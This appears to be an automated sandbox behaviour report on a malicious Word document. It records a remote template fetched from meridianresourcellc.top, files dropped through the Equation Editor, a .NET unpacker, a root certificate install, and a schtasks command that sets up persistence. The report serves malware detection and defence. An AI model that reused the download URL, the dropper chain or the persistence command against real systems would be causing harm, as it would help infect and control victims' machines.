                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                Source: order072724.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\order072724.docx.doc
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: order072724.docx.docInitial sample: OLE zip file path = word/_rels/settings.xml.rels
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: lxqb.pdbSHA256 source: swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.dr
                Source: Binary string: lxqb.pdb source: swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.dr
                Source: order072724.docx.docInitial sample: OLE indicators vbamacros = False

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: swagodi[1].scr.9.dr, frmMain.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: swagodi78811.scr.9.dr, frmMain.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: gRpkBp.exe.10.dr, frmMain.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 10.2.swagodi78811.scr.620000.0.raw.unpack, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                Source: 10.2.swagodi78811.scr.620000.0.raw.unpack, PingPong.cs.Net Code: Justy
                Source: 10.2.swagodi78811.scr.2127a8c.3.raw.unpack, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                Source: 10.2.swagodi78811.scr.2127a8c.3.raw.unpack, PingPong.cs.Net Code: Justy
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, fgdXJt4fnOeV6XjIJC.cs.Net Code: JKVNGoEM53 System.Reflection.Assembly.Load(byte[])
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, fgdXJt4fnOeV6XjIJC.cs.Net Code: JKVNGoEM53 System.Reflection.Assembly.Load(byte[])
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, fgdXJt4fnOeV6XjIJC.cs.Net Code: JKVNGoEM53 System.Reflection.Assembly.Load(byte[])
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0055C152 pushad ; retn 0055h9_2_0055C209
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00558F60 push eax; retf 9_2_00558F61
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_005501F4 push eax; retf 9_2_005501F5
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0020D6DC pushad ; iretd 20_2_0020D6E1
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 22_2_0025BEF0 push esp; iretd 22_2_0025BEF5
                Source: swagodi[1].scr.9.drStatic PE information: section name: .text entropy: 7.981247900601898
                Source: swagodi78811.scr.9.drStatic PE information: section name: .text entropy: 7.981247900601898
                Source: gRpkBp.exe.10.drStatic PE information: section name: .text entropy: 7.981247900601898
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, j3BhvJfAOoaHD0q32a.csHigh entropy of concatenated method names: 'oCj2eDBcCM', 'JaW2iA9Shr', 'ddt2ClWngX', 'FIY2aAsKsC', 'p1U2ciuS8Z', 'W8a2R6Qk6O', 'RK22m0CAQS', 'VH823G70HW', 'rZE2MquQ1x', 'xS42oL7F1b'
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, HJDXHuKnd7XJBuPZf8.csHigh entropy of concatenated method names: 'VQwabmJbTU', 'YA1apxOieF', 'PDpC1Jwrfu', 'p4qCvpYjob', 'ELPCsoNZJB', 'Y3mCSof5J3', 'DE0ChOHF2L', 'EMICI31HMa', 'YcKCk7pH9G', 'XeFCB6xw5g'
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, qQF8AtuGm7BarQ18w7.csHigh entropy of concatenated method names: 'osJGfVktE', 'yijtXqxT0', 'H9dlqJ1vP', 'l0tpnoGrT', 'hiFw20lAp', 'nnm8PcMMq', 'rguij3rCiOn6f9gJi0', 'PB6ujyyY1f7AbyHI8I', 'p7p2OvtQZ', 'ksLWAKYLu'
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, z6pv7rdU5kvjgZPMj0.csHigh entropy of concatenated method names: 'Dispose', 'nW9fJC7Y49', 'DbSyqXsEqa', 'F4S44OKEic', 'dBqf5eebKK', 'bmCfzmgl0C', 'ProcessDialogKey', 'Em9ygDklGk', 'oUryfpdjQR', 'SSUyySyXDq'
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, FUjasOohxIjsRf91GS.csHigh entropy of concatenated method names: 'QY7iYDoJHp', 'HGniXUdcD2', 'qaeiDhlvpC', 'fXZindkmGt', 'Qdbi7EY5ul', 'yFjiHZXGLb', 'VkgiTNqoxL', 'mt3irTCkBH', 'po4iJKsJYx', 'WkKi5YeoWS'
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, j8Qml7kLfnNplRy1hI.csHigh entropy of concatenated method names: 'DOt2KMq3tY', 'rcR2qVb5bW', 'pOH21Mf1R0', 'KYX2vQlNAY', 'Clc2Y9w2VL', 'Usq2sk1HZ1', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, EBUmNYVABALmIokp9f.csHigh entropy of concatenated method names: 'Y0wReJBW83', 'kRIRCa3nF5', 'DBGRcmxh28', 'qUSc57WdB3', 'Twacz4txuK', 'aQZRg4qWQl', 'iJRRfmHiMd', 'FpLRymxihp', 'HHDR0n8o0R', 'RIDRNVvTaT'
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, fgdXJt4fnOeV6XjIJC.csHigh entropy of concatenated method names: 'aZF0EdgrJe', 'XCE0eNq9fR', 'oh80iGKxUq', 'Gcd0CnkGDE', 'QoV0ai0QbB', 'BaS0cwTBbG', 'QVt0Rd984F', 'Ctb0m4CNRf', 'XG403njMfh', 'G1b0MNIsyQ'
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, vPbiHgzJKkLT4EtXh3.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PbYuFdJMwo', 'CjcuZxY51I', 'GP4udf1xpT', 'Coau61FgV5', 'Vavu2BTrfo', 'KfQuuIFyY8', 'KcwuWRKZn4'
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, OK3X7QZlBJ2Zm72Re2.csHigh entropy of concatenated method names: 'W5dcEHYqZd', 'u04ciTu9P4', 'IjUcak9BTV', 'wPicRDNdtP', 'AtkcmSDl9T', 'JRUa7jb0e8', 'xhyaHNAwU7', 'dIEaTR3t5S', 'RRfarKYrOd', 'dE2aJjBOcd'
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, BxSxBGjWdM9kRNhawOJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uLyWYQt1J1', 'ntAWXjb1oF', 'tMbWDQXAA4', 'yyvWnOhsqR', 'xwMW7b4QF9', 'u9LWH62pAZ', 'w5BWTq7rLQ'
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, MyqKeWG6lullt0slAL.csHigh entropy of concatenated method names: 'qoTfRfySDo', 'WDUfmARhGB', 'D5DfMTcmKU', 'hpvfoT1iK1', 'gJpfZgtP6h', 'KQHfduWWyQ', 'rpcRSoIBQ57BUDmqdc', 'pt9w83Gsp9iPf1InfV', 'FcEnRUpTEb5MKOcRhJ', 's4xff3HfnC'
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, EAjgrar6JjgJlO01q9.csHigh entropy of concatenated method names: 'aSRFjlyn2x', 'vxRFwAFjdh', 'jryFKcHqba', 'fHVFqHDoJF', 'UK6FvAkYsr', 'LDgFsd5Y1Q', 'NYIFhi8moa', 'mf8FIVq6Fn', 'lduFBZwfXs', 'hBwFAIj86Z'
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, Ii3oNOI3i98I4b04u6.csHigh entropy of concatenated method names: 'XP4CtRh3Rw', 'uk8Cl6BJ4p', 'Ov5Cj5O8Un', 'PEhCwQyQDa', 'd4PCZqsr3O', 'adOCdCmPCL', 'r8JC6TUyKA', 'JacC2ZdWhA', 'FniCurWda9', 'CSLCW1I9nQ'
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, bAbhZUjcvmmSaJhbsMu.csHigh entropy of concatenated method names: 'a1QuL0NrFj', 'ONVuPaqeba', 'INZuG8RCQ2', 'VKZutCaFmt', 'WfLub5VBqG', 'w6huld8LP4', 'W9Hup6uLp7', 'lPLujRbM8p', 'vh6uwnK1Dx', 'ba9u8JVBns'
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, pTdTlrEvmDRRL24B7c.csHigh entropy of concatenated method names: 'qdRRLd68xx', 'lYIRPM5JdT', 'v2NRGGqMUw', 'E0NRtcHWQm', 'XKCRbYYOpw', 'KGORlovOAo', 'ke6Rp4c9Iy', 'QlqRjDVbOK', 'qC3RwabaDR', 'ResR8jShpu'
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, VbQFPTPSSxlurm7Wrc.csHigh entropy of concatenated method names: 'ToString', 'cmUdAoPhyV', 'yUYdqR2gjr', 'PQBd1RjlCh', 'xXmdvsCk0W', 'o8adscFbKZ', 'QMydS4V73y', 'VP3dhSoxI5', 'KwCdIb2vYd', 'q7FdkcfdiR'
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, dbodLQg9g3GrmB8wGu.csHigh entropy of concatenated method names: 'FwMufWDisn', 'uFUu0XS7Hm', 'spAuNCsuSQ', 'wgFueLJeUB', 'JmTuicD9Bv', 'X45uai6KN5', 'x22ucnVePH', 'xkB2T8DDnE', 'cFQ2rxbPH5', 'Syo2JdYRsB'
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, QQ1L22qkxrIU3E6iOb.csHigh entropy of concatenated method names: 'cTOZBFPV2q', 'wGAZVtmrmD', 'RLGZYVLWlq', 'NeFZXcUB27', 'tWiZqouw15', 'kDxZ10LenO', 'acJZvcUTuS', 'GflZs32HuT', 'kNFZSQcZoH', 'AkUZhGN0MA'
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, vOisVsp2ujdyCRDr6Q.csHigh entropy of concatenated method names: 'K2J6rGwcc3', 'rT265rhMrY', 'gaI2gntTs8', 'apL2fUpbUs', 'I0M6AwqGw8', 'Quj6VvdrUi', 'i1m6xnhB7E', 'xhH6YkTWZT', 'RT56XrsYb3', 'q5u6DgDon5'
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, j3BhvJfAOoaHD0q32a.csHigh entropy of concatenated method names: 'oCj2eDBcCM', 'JaW2iA9Shr', 'ddt2ClWngX', 'FIY2aAsKsC', 'p1U2ciuS8Z', 'W8a2R6Qk6O', 'RK22m0CAQS', 'VH823G70HW', 'rZE2MquQ1x', 'xS42oL7F1b'
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, HJDXHuKnd7XJBuPZf8.csHigh entropy of concatenated method names: 'VQwabmJbTU', 'YA1apxOieF', 'PDpC1Jwrfu', 'p4qCvpYjob', 'ELPCsoNZJB', 'Y3mCSof5J3', 'DE0ChOHF2L', 'EMICI31HMa', 'YcKCk7pH9G', 'XeFCB6xw5g'
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, qQF8AtuGm7BarQ18w7.csHigh entropy of concatenated method names: 'osJGfVktE', 'yijtXqxT0', 'H9dlqJ1vP', 'l0tpnoGrT', 'hiFw20lAp', 'nnm8PcMMq', 'rguij3rCiOn6f9gJi0', 'PB6ujyyY1f7AbyHI8I', 'p7p2OvtQZ', 'ksLWAKYLu'
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, z6pv7rdU5kvjgZPMj0.csHigh entropy of concatenated method names: 'Dispose', 'nW9fJC7Y49', 'DbSyqXsEqa', 'F4S44OKEic', 'dBqf5eebKK', 'bmCfzmgl0C', 'ProcessDialogKey', 'Em9ygDklGk', 'oUryfpdjQR', 'SSUyySyXDq'
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, FUjasOohxIjsRf91GS.csHigh entropy of concatenated method names: 'QY7iYDoJHp', 'HGniXUdcD2', 'qaeiDhlvpC', 'fXZindkmGt', 'Qdbi7EY5ul', 'yFjiHZXGLb', 'VkgiTNqoxL', 'mt3irTCkBH', 'po4iJKsJYx', 'WkKi5YeoWS'
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, j8Qml7kLfnNplRy1hI.csHigh entropy of concatenated method names: 'DOt2KMq3tY', 'rcR2qVb5bW', 'pOH21Mf1R0', 'KYX2vQlNAY', 'Clc2Y9w2VL', 'Usq2sk1HZ1', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, EBUmNYVABALmIokp9f.csHigh entropy of concatenated method names: 'Y0wReJBW83', 'kRIRCa3nF5', 'DBGRcmxh28', 'qUSc57WdB3', 'Twacz4txuK', 'aQZRg4qWQl', 'iJRRfmHiMd', 'FpLRymxihp', 'HHDR0n8o0R', 'RIDRNVvTaT'
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, fgdXJt4fnOeV6XjIJC.csHigh entropy of concatenated method names: 'aZF0EdgrJe', 'XCE0eNq9fR', 'oh80iGKxUq', 'Gcd0CnkGDE', 'QoV0ai0QbB', 'BaS0cwTBbG', 'QVt0Rd984F', 'Ctb0m4CNRf', 'XG403njMfh', 'G1b0MNIsyQ'
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, vPbiHgzJKkLT4EtXh3.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PbYuFdJMwo', 'CjcuZxY51I', 'GP4udf1xpT', 'Coau61FgV5', 'Vavu2BTrfo', 'KfQuuIFyY8', 'KcwuWRKZn4'
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, OK3X7QZlBJ2Zm72Re2.csHigh entropy of concatenated method names: 'W5dcEHYqZd', 'u04ciTu9P4', 'IjUcak9BTV', 'wPicRDNdtP', 'AtkcmSDl9T', 'JRUa7jb0e8', 'xhyaHNAwU7', 'dIEaTR3t5S', 'RRfarKYrOd', 'dE2aJjBOcd'
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, BxSxBGjWdM9kRNhawOJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uLyWYQt1J1', 'ntAWXjb1oF', 'tMbWDQXAA4', 'yyvWnOhsqR', 'xwMW7b4QF9', 'u9LWH62pAZ', 'w5BWTq7rLQ'
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, MyqKeWG6lullt0slAL.csHigh entropy of concatenated method names: 'qoTfRfySDo', 'WDUfmARhGB', 'D5DfMTcmKU', 'hpvfoT1iK1', 'gJpfZgtP6h', 'KQHfduWWyQ', 'rpcRSoIBQ57BUDmqdc', 'pt9w83Gsp9iPf1InfV', 'FcEnRUpTEb5MKOcRhJ', 's4xff3HfnC'
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, EAjgrar6JjgJlO01q9.csHigh entropy of concatenated method names: 'aSRFjlyn2x', 'vxRFwAFjdh', 'jryFKcHqba', 'fHVFqHDoJF', 'UK6FvAkYsr', 'LDgFsd5Y1Q', 'NYIFhi8moa', 'mf8FIVq6Fn', 'lduFBZwfXs', 'hBwFAIj86Z'
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, Ii3oNOI3i98I4b04u6.csHigh entropy of concatenated method names: 'XP4CtRh3Rw', 'uk8Cl6BJ4p', 'Ov5Cj5O8Un', 'PEhCwQyQDa', 'd4PCZqsr3O', 'adOCdCmPCL', 'r8JC6TUyKA', 'JacC2ZdWhA', 'FniCurWda9', 'CSLCW1I9nQ'
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, bAbhZUjcvmmSaJhbsMu.csHigh entropy of concatenated method names: 'a1QuL0NrFj', 'ONVuPaqeba', 'INZuG8RCQ2', 'VKZutCaFmt', 'WfLub5VBqG', 'w6huld8LP4', 'W9Hup6uLp7', 'lPLujRbM8p', 'vh6uwnK1Dx', 'ba9u8JVBns'
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, pTdTlrEvmDRRL24B7c.csHigh entropy of concatenated method names: 'qdRRLd68xx', 'lYIRPM5JdT', 'v2NRGGqMUw', 'E0NRtcHWQm', 'XKCRbYYOpw', 'KGORlovOAo', 'ke6Rp4c9Iy', 'QlqRjDVbOK', 'qC3RwabaDR', 'ResR8jShpu'
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, VbQFPTPSSxlurm7Wrc.csHigh entropy of concatenated method names: 'ToString', 'cmUdAoPhyV', 'yUYdqR2gjr', 'PQBd1RjlCh', 'xXmdvsCk0W', 'o8adscFbKZ', 'QMydS4V73y', 'VP3dhSoxI5', 'KwCdIb2vYd', 'q7FdkcfdiR'
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, dbodLQg9g3GrmB8wGu.csHigh entropy of concatenated method names: 'FwMufWDisn', 'uFUu0XS7Hm', 'spAuNCsuSQ', 'wgFueLJeUB', 'JmTuicD9Bv', 'X45uai6KN5', 'x22ucnVePH', 'xkB2T8DDnE', 'cFQ2rxbPH5', 'Syo2JdYRsB'
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, QQ1L22qkxrIU3E6iOb.csHigh entropy of concatenated method names: 'cTOZBFPV2q', 'wGAZVtmrmD', 'RLGZYVLWlq', 'NeFZXcUB27', 'tWiZqouw15', 'kDxZ10LenO', 'acJZvcUTuS', 'GflZs32HuT', 'kNFZSQcZoH', 'AkUZhGN0MA'
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, vOisVsp2ujdyCRDr6Q.csHigh entropy of concatenated method names: 'K2J6rGwcc3', 'rT265rhMrY', 'gaI2gntTs8', 'apL2fUpbUs', 'I0M6AwqGw8', 'Quj6VvdrUi', 'i1m6xnhB7E', 'xhH6YkTWZT', 'RT56XrsYb3', 'q5u6DgDon5'
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, j3BhvJfAOoaHD0q32a.csHigh entropy of concatenated method names: 'oCj2eDBcCM', 'JaW2iA9Shr', 'ddt2ClWngX', 'FIY2aAsKsC', 'p1U2ciuS8Z', 'W8a2R6Qk6O', 'RK22m0CAQS', 'VH823G70HW', 'rZE2MquQ1x', 'xS42oL7F1b'
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, HJDXHuKnd7XJBuPZf8.csHigh entropy of concatenated method names: 'VQwabmJbTU', 'YA1apxOieF', 'PDpC1Jwrfu', 'p4qCvpYjob', 'ELPCsoNZJB', 'Y3mCSof5J3', 'DE0ChOHF2L', 'EMICI31HMa', 'YcKCk7pH9G', 'XeFCB6xw5g'
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, qQF8AtuGm7BarQ18w7.csHigh entropy of concatenated method names: 'osJGfVktE', 'yijtXqxT0', 'H9dlqJ1vP', 'l0tpnoGrT', 'hiFw20lAp', 'nnm8PcMMq', 'rguij3rCiOn6f9gJi0', 'PB6ujyyY1f7AbyHI8I', 'p7p2OvtQZ', 'ksLWAKYLu'
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, z6pv7rdU5kvjgZPMj0.csHigh entropy of concatenated method names: 'Dispose', 'nW9fJC7Y49', 'DbSyqXsEqa', 'F4S44OKEic', 'dBqf5eebKK', 'bmCfzmgl0C', 'ProcessDialogKey', 'Em9ygDklGk', 'oUryfpdjQR', 'SSUyySyXDq'
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, FUjasOohxIjsRf91GS.csHigh entropy of concatenated method names: 'QY7iYDoJHp', 'HGniXUdcD2', 'qaeiDhlvpC', 'fXZindkmGt', 'Qdbi7EY5ul', 'yFjiHZXGLb', 'VkgiTNqoxL', 'mt3irTCkBH', 'po4iJKsJYx', 'WkKi5YeoWS'
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, j8Qml7kLfnNplRy1hI.csHigh entropy of concatenated method names: 'DOt2KMq3tY', 'rcR2qVb5bW', 'pOH21Mf1R0', 'KYX2vQlNAY', 'Clc2Y9w2VL', 'Usq2sk1HZ1', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, EBUmNYVABALmIokp9f.csHigh entropy of concatenated method names: 'Y0wReJBW83', 'kRIRCa3nF5', 'DBGRcmxh28', 'qUSc57WdB3', 'Twacz4txuK', 'aQZRg4qWQl', 'iJRRfmHiMd', 'FpLRymxihp', 'HHDR0n8o0R', 'RIDRNVvTaT'
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, fgdXJt4fnOeV6XjIJC.csHigh entropy of concatenated method names: 'aZF0EdgrJe', 'XCE0eNq9fR', 'oh80iGKxUq', 'Gcd0CnkGDE', 'QoV0ai0QbB', 'BaS0cwTBbG', 'QVt0Rd984F', 'Ctb0m4CNRf', 'XG403njMfh', 'G1b0MNIsyQ'
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, vPbiHgzJKkLT4EtXh3.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PbYuFdJMwo', 'CjcuZxY51I', 'GP4udf1xpT', 'Coau61FgV5', 'Vavu2BTrfo', 'KfQuuIFyY8', 'KcwuWRKZn4'
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, OK3X7QZlBJ2Zm72Re2.csHigh entropy of concatenated method names: 'W5dcEHYqZd', 'u04ciTu9P4', 'IjUcak9BTV', 'wPicRDNdtP', 'AtkcmSDl9T', 'JRUa7jb0e8', 'xhyaHNAwU7', 'dIEaTR3t5S', 'RRfarKYrOd', 'dE2aJjBOcd'
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, BxSxBGjWdM9kRNhawOJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uLyWYQt1J1', 'ntAWXjb1oF', 'tMbWDQXAA4', 'yyvWnOhsqR', 'xwMW7b4QF9', 'u9LWH62pAZ', 'w5BWTq7rLQ'
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, MyqKeWG6lullt0slAL.csHigh entropy of concatenated method names: 'qoTfRfySDo', 'WDUfmARhGB', 'D5DfMTcmKU', 'hpvfoT1iK1', 'gJpfZgtP6h', 'KQHfduWWyQ', 'rpcRSoIBQ57BUDmqdc', 'pt9w83Gsp9iPf1InfV', 'FcEnRUpTEb5MKOcRhJ', 's4xff3HfnC'
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, EAjgrar6JjgJlO01q9.csHigh entropy of concatenated method names: 'aSRFjlyn2x', 'vxRFwAFjdh', 'jryFKcHqba', 'fHVFqHDoJF', 'UK6FvAkYsr', 'LDgFsd5Y1Q', 'NYIFhi8moa', 'mf8FIVq6Fn', 'lduFBZwfXs', 'hBwFAIj86Z'
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, Ii3oNOI3i98I4b04u6.csHigh entropy of concatenated method names: 'XP4CtRh3Rw', 'uk8Cl6BJ4p', 'Ov5Cj5O8Un', 'PEhCwQyQDa', 'd4PCZqsr3O', 'adOCdCmPCL', 'r8JC6TUyKA', 'JacC2ZdWhA', 'FniCurWda9', 'CSLCW1I9nQ'
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, bAbhZUjcvmmSaJhbsMu.csHigh entropy of concatenated method names: 'a1QuL0NrFj', 'ONVuPaqeba', 'INZuG8RCQ2', 'VKZutCaFmt', 'WfLub5VBqG', 'w6huld8LP4', 'W9Hup6uLp7', 'lPLujRbM8p', 'vh6uwnK1Dx', 'ba9u8JVBns'
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, pTdTlrEvmDRRL24B7c.csHigh entropy of concatenated method names: 'qdRRLd68xx', 'lYIRPM5JdT', 'v2NRGGqMUw', 'E0NRtcHWQm', 'XKCRbYYOpw', 'KGORlovOAo', 'ke6Rp4c9Iy', 'QlqRjDVbOK', 'qC3RwabaDR', 'ResR8jShpu'
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, VbQFPTPSSxlurm7Wrc.csHigh entropy of concatenated method names: 'ToString', 'cmUdAoPhyV', 'yUYdqR2gjr', 'PQBd1RjlCh', 'xXmdvsCk0W', 'o8adscFbKZ', 'QMydS4V73y', 'VP3dhSoxI5', 'KwCdIb2vYd', 'q7FdkcfdiR'
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, dbodLQg9g3GrmB8wGu.csHigh entropy of concatenated method names: 'FwMufWDisn', 'uFUu0XS7Hm', 'spAuNCsuSQ', 'wgFueLJeUB', 'JmTuicD9Bv', 'X45uai6KN5', 'x22ucnVePH', 'xkB2T8DDnE', 'cFQ2rxbPH5', 'Syo2JdYRsB'
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, QQ1L22qkxrIU3E6iOb.csHigh entropy of concatenated method names: 'cTOZBFPV2q', 'wGAZVtmrmD', 'RLGZYVLWlq', 'NeFZXcUB27', 'tWiZqouw15', 'kDxZ10LenO', 'acJZvcUTuS', 'GflZs32HuT', 'kNFZSQcZoH', 'AkUZhGN0MA'
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, vOisVsp2ujdyCRDr6Q.csHigh entropy of concatenated method names: 'K2J6rGwcc3', 'rT265rhMrY', 'gaI2gntTs8', 'apL2fUpbUs', 'I0M6AwqGw8', 'Quj6VvdrUi', 'i1m6xnhB7E', 'xhH6YkTWZT', 'RT56XrsYb3', 'q5u6DgDon5'

                Persistence and Installation Behavior

                barindex
                Microsoft Office launches external ms-search protocol handler (WebDAV)
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\meridianresourcellc.top@SSL\DavWWWRootJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\meridianresourcellc.top@SSL\DavWWWRootJump to behavior
                Contains an external reference to another file
                Source: settings.xml.relsExtracted files from sample: https://meridianresourcellc.top/swagodi.doc
                Drops PE files with a suspicious file extension
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\swagodi78811.scrJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\swagodi[1].scrJump to dropped file
                Installs new ROOT certificates
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Office drops RTF file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: swagodi[1].doc.0.drJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: 9F4A4ED3.doc.0.drJump to dropped file
                Office viewer loads remote template
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile created: C:\Users\user\AppData\Roaming\gRpkBp.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\swagodi78811.scrJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\swagodi[1].scrJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp"
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
